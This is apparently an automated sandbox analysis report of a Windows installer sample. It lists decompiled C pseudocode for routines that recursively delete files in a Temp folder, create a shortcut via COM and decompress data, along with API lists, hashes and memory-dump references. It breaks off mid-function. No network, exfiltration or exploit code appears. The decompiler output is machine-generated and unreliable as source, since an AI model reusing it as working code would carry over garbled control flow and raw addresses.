                        C-Code - Quality: 98%
                        			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v8;
                        				signed int _v12;
                        				short _v556;
                        				short _v558;
                        				struct _WIN32_FIND_DATAW _v604;
                        				signed int _t38;
                        				signed int _t52;
                        				signed int _t55;
                        				signed int _t62;
                        				void* _t64;
                        				signed char _t65;
                        				WCHAR* _t66;
                        				void* _t67;
                        				WCHAR* _t68;
                        				void* _t70;
                        
                        				_t65 = _a8;
                        				_t68 = _a4;
                        				_v8 = _t65 & 0x00000004;
                        				_t38 = E00405F14(__eflags, _t68);
                        				_v12 = _t38;
                        				if((_t65 & 0x00000008) != 0) {
                        					_t62 = DeleteFileW(_t68);
                        					asm("sbb eax, eax");
                        					_t64 =  ~_t62 + 1;
                        					 *0x434f88 =  *0x434f88 + _t64;
                        					return _t64;
                        				}
                        				_a4 = _t65;
                        				_t8 =  &_a4;
                        				 *_t8 = _a4 & 0x00000001;
                        				__eflags =  *_t8;
                        				if( *_t8 == 0) {
                        					L5:
                        					E0040653D(0x42f270, _t68);
                        					__eflags = _a4;
                        					if(_a4 == 0) {
                        						E00405E58(_t68);
                        					} else {
                        						lstrcatW(0x42f270, L"\\*.*");
                        					}
                        					__eflags =  *_t68;
                        					if( *_t68 != 0) {
                        						L10:
                        						lstrcatW(_t68, 0x40a014);
                        						L11:
                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                        						_t38 = FindFirstFileW(0x42f270,  &_v604);
                        						_t70 = _t38;
                        						__eflags = _t70 - 0xffffffff;
                        						if(_t70 == 0xffffffff) {
                        							L26:
                        							__eflags = _a4;
                        							if(_a4 != 0) {
                        								_t30 = _t66 - 2;
                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                        								__eflags =  *_t30;
                        							}
                        							goto L28;
                        						} else {
                        							goto L12;
                        						}
                        						do {
                        							L12:
                        							__eflags = _v604.cFileName - 0x2e;
                        							if(_v604.cFileName != 0x2e) {
                        								L16:
                        								E0040653D(_t66,  &(_v604.cFileName));
                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                        								if(__eflags == 0) {
                        									_t52 = E00405C01(__eflags, _t68, _v8);
                        									__eflags = _t52;
                        									if(_t52 != 0) {
                        										E0040559F(0xfffffff2, _t68);
                        									} else {
                        										__eflags = _v8 - _t52;
                        										if(_v8 == _t52) {
                        											 *0x434f88 =  *0x434f88 + 1;
                        										} else {
                        											E0040559F(0xfffffff1, _t68);
                        											E004062FD(_t67, _t68, 0);
                        										}
                        									}
                        								} else {
                        									__eflags = (_a8 & 0x00000003) - 3;
                        									if(__eflags == 0) {
                        										E00405C49(__eflags, _t68, _a8);
                        									}
                        								}
                        								goto L24;
                        							}
                        							__eflags = _v558;
                        							if(_v558 == 0) {
                        								goto L24;
                        							}
                        							__eflags = _v558 - 0x2e;
                        							if(_v558 != 0x2e) {
                        								goto L16;
                        							}
                        							__eflags = _v556;
                        							if(_v556 == 0) {
                        								goto L24;
                        							}
                        							goto L16;
                        							L24:
                        							_t55 = FindNextFileW(_t70,  &_v604);
                        							__eflags = _t55;
                        						} while (_t55 != 0);
                        						_t38 = FindClose(_t70);
                        						goto L26;
                        					}
                        					__eflags =  *0x42f270 - 0x5c;
                        					if( *0x42f270 != 0x5c) {
                        						goto L11;
                        					}
                        					goto L10;
                        				} else {
                        					__eflags = _t38;
                        					if(_t38 == 0) {
                        						L28:
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L36:
                        							return _t38;
                        						}
                        						__eflags = _v12;
                        						if(_v12 != 0) {
                        							_t38 = E00406873(_t68);
                        							__eflags = _t38;
                        							if(_t38 == 0) {
                        								goto L36;
                        							}
                        							E00405E0C(_t68);
                        							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                        							__eflags = _t38;
                        							if(_t38 != 0) {
                        								return E0040559F(0xffffffe5, _t68);
                        							}
                        							__eflags = _v8;
                        							if(_v8 == 0) {
                        								goto L30;
                        							}
                        							E0040559F(0xfffffff1, _t68);
                        							return E004062FD(_t67, _t68, 0);
                        						}
                        						L30:
                        						 *0x434f88 =  *0x434f88 + 1;
                        						return _t38;
                        					}
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) == 0) {
                        						goto L28;
                        					}
                        					goto L5;
                        				}
                        			}


















                        0x00405c53
                        0x00405c58
                        0x00405c61
                        0x00405c64
                        0x00405c6c
                        0x00405c6f
                        0x00405c72
                        0x00405c7a
                        0x00405c7c
                        0x00405c7d
                        0x00000000
                        0x00405c7d
                        0x00405c88
                        0x00405c8b
                        0x00405c8b
                        0x00405c8b
                        0x00405c8f
                        0x00405ca2
                        0x00405ca9
                        0x00405cae
                        0x00405cb2
                        0x00405cc2
                        0x00405cb4
                        0x00405cba
                        0x00405cba
                        0x00405cc7
                        0x00405ccb
                        0x00405cd7
                        0x00405cdd
                        0x00405ce2
                        0x00405ce8
                        0x00405cf3
                        0x00405cf9
                        0x00405cfb
                        0x00405cfe
                        0x00405da8
                        0x00405da8
                        0x00405dac
                        0x00405dae
                        0x00405dae
                        0x00405dae
                        0x00405dae
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d04
                        0x00405d04
                        0x00405d04
                        0x00405d0c
                        0x00405d2c
                        0x00405d34
                        0x00405d39
                        0x00405d40
                        0x00405d5b
                        0x00405d60
                        0x00405d62
                        0x00405d86
                        0x00405d64
                        0x00405d64
                        0x00405d67
                        0x00405d7b
                        0x00405d69
                        0x00405d6c
                        0x00405d74
                        0x00405d74
                        0x00405d67
                        0x00405d42
                        0x00405d48
                        0x00405d4a
                        0x00405d50
                        0x00405d50
                        0x00405d4a
                        0x00000000
                        0x00405d40
                        0x00405d0e
                        0x00405d16
                        0x00000000
                        0x00000000
                        0x00405d18
                        0x00405d20
                        0x00000000
                        0x00000000
                        0x00405d22
                        0x00405d2a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405d8b
                        0x00405d93
                        0x00405d99
                        0x00405d99
                        0x00405da2
                        0x00000000
                        0x00405da2
                        0x00405ccd
                        0x00405cd5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405c91
                        0x00405c91
                        0x00405c93
                        0x00405db3
                        0x00405db5
                        0x00405db8
                        0x00405e09
                        0x00405e09
                        0x00405e09
                        0x00405dba
                        0x00405dbd
                        0x00405dc8
                        0x00405dcd
                        0x00405dcf
                        0x00000000
                        0x00000000
                        0x00405dd2
                        0x00405dde
                        0x00405de3
                        0x00405de5
                        0x00000000
                        0x00405e00
                        0x00405de7
                        0x00405dea
                        0x00000000
                        0x00000000
                        0x00405def
                        0x00000000
                        0x00405df6
                        0x00405dbf
                        0x00405dbf
                        0x00000000
                        0x00405dbf
                        0x00405c99
                        0x00405c9c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405c9c

                        APIs
                        • DeleteFileW.KERNEL32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                        • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                        • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                        • FindClose.KERNEL32(00000000), ref: 00405DA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                        • API String ID: 2035342205-4130279798
                        • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                        • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                        • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                        • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E004021AA(void* __eflags) {
                        				signed int _t52;
                        				void* _t56;
                        				intOrPtr* _t60;
                        				intOrPtr _t61;
                        				intOrPtr* _t62;
                        				intOrPtr* _t64;
                        				intOrPtr* _t66;
                        				intOrPtr* _t68;
                        				intOrPtr* _t70;
                        				intOrPtr* _t72;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr* _t78;
                        				intOrPtr* _t80;
                        				void* _t83;
                        				intOrPtr* _t91;
                        				signed int _t101;
                        				signed int _t105;
                        				void* _t107;
                        
                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                        				_t52 =  *(_t107 - 0x20);
                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                        				_t101 = _t52 & 0x00008000;
                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                        				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                        					E00402DA6(0x21);
                        				}
                        				_t56 = _t107 + 8;
                        				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                        				if(_t56 < _t83) {
                        					L14:
                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                        					_push(0xfffffff0);
                        				} else {
                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                        					if(_t61 >= _t83) {
                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                        						if(_t101 == _t83) {
                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
                        						}
                        						if(_t105 != _t83) {
                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                        						}
                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                        						if( *_t91 != _t83) {
                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                        						}
                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                        						}
                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                        					}
                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                        						_push(0xfffffff4);
                        					} else {
                        						goto L14;
                        					}
                        				}
                        				E00401423();
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                        				return 0;
                        			}






















                        0x004021b3
                        0x004021bd
                        0x004021c7
                        0x004021d1
                        0x004021dc
                        0x004021df
                        0x004021f9
                        0x004021fc
                        0x00402202
                        0x00402205
                        0x0040220f
                        0x00402213
                        0x00402213
                        0x00402218
                        0x00402229
                        0x00402231
                        0x004022e8
                        0x004022e8
                        0x004022ef
                        0x00402237
                        0x00402237
                        0x00402246
                        0x0040224a
                        0x0040224d
                        0x00402253
                        0x00402261
                        0x00402264
                        0x00402266
                        0x00402271
                        0x00402271
                        0x00402276
                        0x00402278
                        0x0040227f
                        0x0040227f
                        0x00402282
                        0x0040228b
                        0x0040228e
                        0x00402294
                        0x00402296
                        0x004022a0
                        0x004022a0
                        0x004022a3
                        0x004022ac
                        0x004022af
                        0x004022b8
                        0x004022be
                        0x004022c0
                        0x004022ce
                        0x004022ce
                        0x004022d1
                        0x004022d7
                        0x004022d7
                        0x004022da
                        0x004022e0
                        0x004022e6
                        0x004022fb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004022e6
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateInstance
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 542301482-47812868
                        • Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                        • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                        • Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                        • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E0040290B(short __ebx, short* __edi) {
                        				void* _t21;
                        
                        				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                        					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                        					_push(_t21 - 0x2b0);
                        					_push(__edi);
                        					E0040653D();
                        				} else {
                        					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                        					 *__edi = __ebx;
                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                        				}
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                        				return 0;
                        			}




                        0x00402923
                        0x0040293e
                        0x00402949
                        0x0040294a
                        0x00402a94
                        0x00402925
                        0x00402928
                        0x0040292b
                        0x0040292e
                        0x0040292e
                        0x00402c2d
                        0x00402c39

                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFindFirst
                        • String ID:
                        • API String ID: 1974802433-0
                        • Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                        • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                        • Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                        • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E00406D85(signed int __ebx, signed int* __esi) {
                        				signed int _t396;
                        				signed int _t425;
                        				signed int _t442;
                        				signed int _t443;
                        				signed int* _t446;
                        				void* _t448;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					_t446 = __esi;
                        					_t425 = __ebx;
                        					if( *(_t448 - 0x34) == 0) {
                        						break;
                        					}
                        					L55:
                        					__eax =  *(__ebp - 0x38);
                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        					__ecx = __ebx;
                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        					__ebx = __ebx + 8;
                        					while(1) {
                        						L56:
                        						if(__ebx < 0xe) {
                        							goto L0;
                        						}
                        						L57:
                        						__eax =  *(__ebp - 0x40);
                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                        						__ecx = __eax;
                        						__esi[1] = __eax;
                        						__ecx = __eax & 0x0000001f;
                        						if(__cl > 0x1d) {
                        							L9:
                        							_t443 = _t442 | 0xffffffff;
                        							 *_t446 = 0x11;
                        							L10:
                        							_t446[0x147] =  *(_t448 - 0x40);
                        							_t446[0x146] = _t425;
                        							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                        							L11:
                        							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                        							_t446[0x26ea] =  *(_t448 - 0x30);
                        							E004074F4( *(_t448 + 8));
                        							return _t443;
                        						}
                        						L58:
                        						__eax = __eax & 0x000003e0;
                        						if(__eax > 0x3a0) {
                        							goto L9;
                        						}
                        						L59:
                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                        						__ebx = __ebx - 0xe;
                        						_t94 =  &(__esi[2]);
                        						 *_t94 = __esi[2] & 0x00000000;
                        						 *__esi = 0xc;
                        						while(1) {
                        							L60:
                        							__esi[1] = __esi[1] >> 0xa;
                        							__eax = (__esi[1] >> 0xa) + 4;
                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                        								goto L68;
                        							}
                        							L61:
                        							while(1) {
                        								L64:
                        								if(__ebx >= 3) {
                        									break;
                        								}
                        								L62:
                        								if( *(__ebp - 0x34) == 0) {
                        									goto L182;
                        								}
                        								L63:
                        								__eax =  *(__ebp - 0x38);
                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        								__ecx = __ebx;
                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        								__ebx = __ebx + 8;
                        							}
                        							L65:
                        							__ecx = __esi[2];
                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                        							__ebx = __ebx - 3;
                        							_t108 = __ecx + 0x4084d4; // 0x121110
                        							__ecx =  *_t108;
                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                        							__ecx = __esi[1];
                        							__esi[2] = __esi[2] + 1;
                        							__eax = __esi[2];
                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                        								goto L64;
                        							}
                        							L66:
                        							while(1) {
                        								L68:
                        								if(__esi[2] >= 0x13) {
                        									break;
                        								}
                        								L67:
                        								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                        								__eax =  *_t119;
                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                        								_t126 =  &(__esi[2]);
                        								 *_t126 = __esi[2] + 1;
                        							}
                        							L69:
                        							__ecx = __ebp - 8;
                        							__edi =  &(__esi[0x143]);
                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                        							__eax = 0;
                        							 *(__ebp - 8) = 0;
                        							__eax =  &(__esi[3]);
                        							 *__edi = 7;
                        							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                        							if(__eax != 0) {
                        								L72:
                        								 *__esi = 0x11;
                        								while(1) {
                        									L180:
                        									_t396 =  *_t446;
                        									if(_t396 > 0xf) {
                        										break;
                        									}
                        									L1:
                        									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                        										case 0:
                        											L101:
                        											__eax = __esi[4] & 0x000000ff;
                        											__esi[3] = __esi[4] & 0x000000ff;
                        											__eax = __esi[5];
                        											__esi[2] = __esi[5];
                        											 *__esi = 1;
                        											goto L102;
                        										case 1:
                        											L102:
                        											__eax = __esi[3];
                        											while(1) {
                        												L105:
                        												__eflags = __ebx - __eax;
                        												if(__ebx >= __eax) {
                        													break;
                        												}
                        												L103:
                        												__eflags =  *(__ebp - 0x34);
                        												if( *(__ebp - 0x34) == 0) {
                        													goto L182;
                        												}
                        												L104:
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                        												__ecx = __ebx;
                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        												__ebx = __ebx + 8;
                        												__eflags = __ebx;
                        											}
                        											L106:
                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                        											__eax = __eax &  *(__ebp - 0x40);
                        											__ecx = __esi[2];
                        											__eax = __esi[2] + __eax * 4;
                        											__ecx =  *(__eax + 1) & 0x000000ff;
                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                        											__ecx =  *__eax & 0x000000ff;
                        											__eflags = __ecx;
                        											if(__ecx != 0) {
                        												L108:
                        												__eflags = __cl & 0x00000010;
                        												if((__cl & 0x00000010) == 0) {
                        													L110:
                        													__eflags = __cl & 0x00000040;
                        													if((__cl & 0x00000040) == 0) {
                        														goto L125;
                        													}
                        													L111:
                        													__eflags = __cl & 0x00000020;
                        													if((__cl & 0x00000020) == 0) {
                        														goto L9;
                        													}
                        													L112:
                        													 *__esi = 7;
                        													goto L180;
                        												}
                        												L109:
                        												__esi[2] = __ecx;
                        												__esi[1] = __eax;
                        												 *__esi = 2;
                        												goto L180;
                        											}
                        											L107:
                        											__esi[2] = __eax;
                        											 *__esi = 6;
                        											goto L180;
                        										case 2:
                        											L113:
                        											__eax = __esi[2];
                        											while(1) {
                        												L116:
                        												__eflags = __ebx - __eax;
                        												if(__ebx >= __eax) {
                        													break;
                        												}
                        												L114:
                        												__eflags =  *(__ebp - 0x34);
                        												if( *(__ebp - 0x34) == 0) {
                        													goto L182;
                        												}
                        												L115:
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                        												__ecx = __ebx;
                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        												__ebx = __ebx + 8;
                        												__eflags = __ebx;
                        											}
                        											L117:
                        											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                        											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                        											__ecx = __eax;
                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        											__ebx = __ebx - __eax;
                        											__eflags = __ebx;
                        											__eax = __esi[4] & 0x000000ff;
                        											__esi[3] = __esi[4] & 0x000000ff;
                        											__eax = __esi[6];
                        											__esi[2] = __esi[6];
                        											 *__esi = 3;
                        											goto L118;
                        										case 3:
                        											L118:
                        											__eax = __esi[3];
                        											while(1) {
                        												L121:
                        												__eflags = __ebx - __eax;
                        												if(__ebx >= __eax) {
                        													break;
                        												}
                        												L119:
                        												__eflags =  *(__ebp - 0x34);
                        												if( *(__ebp - 0x34) == 0) {
                        													goto L182;
                        												}
                        												L120:
                        												__ecx =  *(__ebp - 0x38);
                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                        												__ecx = __ebx;
                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                        												__ebx = __ebx + 8;
                        												__eflags = __ebx;
                        											}
                        											L122:
                        											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                        											__eax = __eax &  *(__ebp - 0x40);
                        											__ecx = __esi[2];
                        											__eax = __esi[2] + __eax * 4;
                        											__ecx =  *(__eax + 1) & 0x000000ff;
                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                        											__ecx =  *__eax & 0x000000ff;
                        											__eflags = __cl & 0x00000010;
                        											if((__cl & 0x00000010) == 0) {
                        												L124:
                        												__eflags = __cl & 0x00000040;
                        												if((__cl & 0x00000040) != 0) {
                        													goto L9;
                        												}
                        												L125:
                        												__esi[3] = __ecx;
                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                        												__esi[2] = __eax;
                        												goto L180;
                        											}
                        											L123:
                        											__esi[2] = __ecx;
                        											__esi[3] = __eax;
                        											 *__esi = 4;
                        											goto L180;
                        										case 4:
                        											L126:
                        											__eax = __esi[2];
                        											while(1) {
                        												L129:
                        												__eflags = __ebx - __eax;
                        												if(__ebx >= __eax) {
                        													break;
                        												}
                        												L127:
                        												__eflags =  *(__ebp - 0x34);
                        												if( *(__ebp - 0x34) == 0) {
                        													goto L182;
                        												}
                        												L128:
